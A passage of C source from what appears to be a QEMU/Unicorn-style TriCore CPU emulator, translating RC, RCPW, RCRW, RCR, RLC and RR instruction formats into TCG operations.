tcg_ctx->cpu_gpr_d[r2], 
tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_MUL_U_64: const9 = MASK_OP_RC_CONST9(ctx->opcode); CHECK_REG_PAIR(r2); gen_muli_i64u(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r2+1], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_MULS_U_32: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_mulsui_i32(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RCPW format */ static void decode_rcpw_insert(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2; int32_t pos, width, const4; TCGv temp; op2 = MASK_OP_RCPW_OP2(ctx->opcode); r1 = MASK_OP_RCPW_S1(ctx->opcode); r2 = MASK_OP_RCPW_D(ctx->opcode); const4 = MASK_OP_RCPW_CONST4(ctx->opcode); width = MASK_OP_RCPW_WIDTH(ctx->opcode); pos = MASK_OP_RCPW_POS(ctx->opcode); switch (op2) { case OPC2_32_RCPW_IMASK: CHECK_REG_PAIR(r2); /* if pos + width > 32 undefined result */ if (pos + width <= 32) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2+1], ((1u << width) - 1) << pos); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], (const4 << pos)); } break; case OPC2_32_RCPW_INSERT: /* if pos + width > 32 undefined result */ if (pos + width <= 32) { temp = tcg_const_i32(tcg_ctx, const4); tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], temp, pos, width); tcg_temp_free(tcg_ctx, temp); } break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RCRW format */ static void decode_rcrw_insert(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r3, r4; int32_t width, const4; TCGv temp, temp2, temp3; op2 = MASK_OP_RCRW_OP2(ctx->opcode); r1 = MASK_OP_RCRW_S1(ctx->opcode); r3 = MASK_OP_RCRW_S3(ctx->opcode); r4 = MASK_OP_RCRW_D(ctx->opcode); width = MASK_OP_RCRW_WIDTH(ctx->opcode); const4 = MASK_OP_RCRW_CONST4(ctx->opcode); temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_RCRW_IMASK: tcg_gen_andi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r4], 0x1f); tcg_gen_movi_tl(tcg_ctx, temp2, (1 << width) - 1); tcg_gen_shl_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3 + 1], temp2, temp); tcg_gen_movi_tl(tcg_ctx, temp2, const4); tcg_gen_shl_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], temp2, temp); break; case OPC2_32_RCRW_INSERT: temp3 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, temp, width); tcg_gen_movi_tl(tcg_ctx, temp2, const4); tcg_gen_andi_tl(tcg_ctx, temp3, tcg_ctx->cpu_gpr_d[r4], 0x1f); gen_insert(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp2, temp, temp3); tcg_temp_free(tcg_ctx, temp3); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } /* RCR format */ static void decode_rcr_cond_select(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r3, r4; int32_t const9; TCGv temp, temp2; op2 = MASK_OP_RCR_OP2(ctx->opcode); r1 = MASK_OP_RCR_S1(ctx->opcode); const9 = MASK_OP_RCR_CONST9_SEXT(ctx->opcode); r3 = MASK_OP_RCR_S3(ctx->opcode); r4 = MASK_OP_RCR_D(ctx->opcode); switch (op2) { case OPC2_32_RCR_CADD: gen_condi_add(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], const9, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RCR_CADDN: gen_condi_add(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], const9, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RCR_SEL: temp = tcg_const_i32(tcg_ctx, 0); temp2 = tcg_const_i32(tcg_ctx, const9); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r4], 
tcg_ctx->cpu_gpr_d[r3], temp, tcg_ctx->cpu_gpr_d[r1], temp2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); break; case OPC2_32_RCR_SELN: temp = tcg_const_i32(tcg_ctx, 0); temp2 = tcg_const_i32(tcg_ctx, const9); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, tcg_ctx->cpu_gpr_d[r1], temp2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rcr_madd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r3, r4; int32_t const9; op2 = MASK_OP_RCR_OP2(ctx->opcode); r1 = MASK_OP_RCR_S1(ctx->opcode); const9 = MASK_OP_RCR_CONST9_SEXT(ctx->opcode); r3 = MASK_OP_RCR_S3(ctx->opcode); r4 = MASK_OP_RCR_D(ctx->opcode); switch (op2) { case OPC2_32_RCR_MADD_32: gen_maddi32_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], const9); break; case OPC2_32_RCR_MADD_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddi64_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], const9); break; case OPC2_32_RCR_MADDS_32: gen_maddsi_32(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], const9); break; case OPC2_32_RCR_MADDS_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsi_64(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], const9); break; case OPC2_32_RCR_MADD_U_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); const9 = MASK_OP_RCR_CONST9(ctx->opcode); gen_maddui64_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], const9); break; case OPC2_32_RCR_MADDS_U_32: const9 = MASK_OP_RCR_CONST9(ctx->opcode); gen_maddsui_32(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], const9); break; case OPC2_32_RCR_MADDS_U_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); const9 = MASK_OP_RCR_CONST9(ctx->opcode); gen_maddsui_64(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], const9); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rcr_msub(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r3, r4; int32_t const9; op2 = MASK_OP_RCR_OP2(ctx->opcode); r1 = MASK_OP_RCR_S1(ctx->opcode); const9 = MASK_OP_RCR_CONST9_SEXT(ctx->opcode); r3 = MASK_OP_RCR_S3(ctx->opcode); r4 = MASK_OP_RCR_D(ctx->opcode); switch (op2) { case OPC2_32_RCR_MSUB_32: gen_msubi32_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], const9); break; case OPC2_32_RCR_MSUB_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubi64_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], const9); break; case OPC2_32_RCR_MSUBS_32: gen_msubsi_32(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], const9); break; case OPC2_32_RCR_MSUBS_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubsi_64(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], const9); break; case OPC2_32_RCR_MSUB_U_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); const9 = MASK_OP_RCR_CONST9(ctx->opcode); gen_msubui64_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], 
tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], const9); break; case OPC2_32_RCR_MSUBS_U_32: const9 = MASK_OP_RCR_CONST9(ctx->opcode); gen_msubsui_32(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], const9); break; case OPC2_32_RCR_MSUBS_U_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); const9 = MASK_OP_RCR_CONST9(ctx->opcode); gen_msubsui_64(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], const9); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RLC format */ static void decode_rlc_opc(DisasContext *ctx, uint32_t op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int32_t const16; int r1, r2; const16 = MASK_OP_RLC_CONST16_SEXT(ctx->opcode); r1 = MASK_OP_RLC_S1(ctx->opcode); r2 = MASK_OP_RLC_D(ctx->opcode); switch (op1) { case OPC1_32_RLC_ADDI: gen_addi_d(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const16); break; case OPC1_32_RLC_ADDIH: gen_addi_d(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const16 << 16); break; case OPC1_32_RLC_ADDIH_A: tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r1], const16 << 16); break; case OPC1_32_RLC_MFCR: const16 = MASK_OP_RLC_CONST16(ctx->opcode); gen_mfcr(ctx, tcg_ctx->cpu_gpr_d[r2], const16); break; case OPC1_32_RLC_MOV: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], const16); break; case OPC1_32_RLC_MOV_64: if (has_feature(ctx, TRICORE_FEATURE_16)) { CHECK_REG_PAIR(r2); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], const16); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2+1], const16 >> 15); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_32_RLC_MOV_U: const16 = MASK_OP_RLC_CONST16(ctx->opcode); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], const16); break; case OPC1_32_RLC_MOV_H: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], const16 << 16); break; case OPC1_32_RLC_MOVH_A: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], const16 << 16); break; case OPC1_32_RLC_MTCR: const16 = MASK_OP_RLC_CONST16(ctx->opcode); gen_mtcr(ctx, tcg_ctx->cpu_gpr_d[r1], const16); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RR format */ static void decode_rr_accumulator(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r3, r2, r1; TCGv temp; r3 = MASK_OP_RR_D(ctx->opcode); r2 = MASK_OP_RR_S2(ctx->opcode); r1 = MASK_OP_RR_S1(ctx->opcode); op2 = MASK_OP_RR_OP2(ctx->opcode); switch (op2) { case OPC2_32_RR_ABS: gen_abs(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABS_B: gen_helper_abs_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABS_H: gen_helper_abs_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABSDIF: gen_absdif(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABSDIF_B: gen_helper_absdif_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABSDIF_H: gen_helper_absdif_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABSDIFS: gen_helper_absdif_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABSDIFS_H: gen_helper_absdif_h_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, 
tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABSS: gen_helper_abs_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ABSS_H: gen_helper_abs_h_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADD: gen_add_d(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADD_B: gen_helper_add_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADD_H: gen_helper_add_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADDC: gen_addc_CC(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADDS: gen_adds(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADDS_H: gen_helper_add_h_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADDS_HU: gen_helper_add_h_suov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADDS_U: gen_helper_add_suov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ADDX: gen_add_CC(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_AND_EQ: gen_accumulating_cond(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_and_tl); break; case OPC2_32_RR_AND_GE: gen_accumulating_cond(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_and_tl); break; case OPC2_32_RR_AND_GE_U: gen_accumulating_cond(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_and_tl); break; case OPC2_32_RR_AND_LT: gen_accumulating_cond(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_and_tl); break; case OPC2_32_RR_AND_LT_U: gen_accumulating_cond(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_and_tl); break; case OPC2_32_RR_AND_NE: gen_accumulating_cond(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_and_tl); break; case OPC2_32_RR_EQ: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_EQ_B: gen_helper_eq_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_EQ_H: gen_helper_eq_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_EQ_W: gen_cond_w(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_EQANY_B: gen_helper_eqany_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_EQANY_H: gen_helper_eqany_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_GE: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_GE_U: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], 
tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_LT: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_LT_U: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_LT_B: gen_helper_lt_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_LT_BU: gen_helper_lt_bu(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_LT_H: gen_helper_lt_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_LT_HU: gen_helper_lt_hu(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_LT_W: gen_cond_w(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_LT_WU: gen_cond_w(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MAX: tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GT, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MAX_U: tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MAX_B: gen_helper_max_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MAX_BU: gen_helper_max_bu(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MAX_H: gen_helper_max_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MAX_HU: gen_helper_max_hu(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MIN: tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MIN_U: tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MIN_B: gen_helper_min_b(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MIN_BU: gen_helper_min_bu(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MIN_H: gen_helper_min_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MIN_HU: gen_helper_min_hu(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MOV: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MOV_64: if (has_feature(ctx, TRICORE_FEATURE_16)) { temp = tcg_temp_new(tcg_ctx); CHECK_REG_PAIR(r3); tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3 + 1], temp); tcg_temp_free(tcg_ctx, temp); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_RR_MOVS_64: if (has_feature(ctx, TRICORE_FEATURE_16)) { CHECK_REG_PAIR(r3); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], 
tcg_ctx->cpu_gpr_d[r2]); tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3 + 1], tcg_ctx->cpu_gpr_d[r2], 31); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_RR_NE: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_OR_EQ: gen_accumulating_cond(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_or_tl); break; case OPC2_32_RR_OR_GE: gen_accumulating_cond(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_or_tl); break; case OPC2_32_RR_OR_GE_U: gen_accumulating_cond(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_or_tl); break; case OPC2_32_RR_OR_LT: gen_accumulating_cond(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_or_tl); break; case OPC2_32_RR_OR_LT_U: gen_accumulating_cond(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_or_tl); break; case OPC2_32_RR_OR_NE: gen_accumulating_cond(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_or_tl); break; case OPC2_32_RR_SAT_B: gen_saturate(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], 0x7f, -0x80); break; case OPC2_32_RR_SAT_BU: gen_saturate_u(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], 0xff); break; case OPC2_32_RR_SAT_H: gen_saturate(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], 0x7fff, -0x8000); break; case OPC2_32_RR_SAT_HU: gen_saturate_u(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], 0xffff); break; case OPC2_32_RR_SH_EQ: gen_sh_cond(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SH_GE: gen_sh_cond(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SH_GE_U: gen_sh_cond(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SH_LT: gen_sh_cond(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SH_LT_U: gen_sh_cond(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], 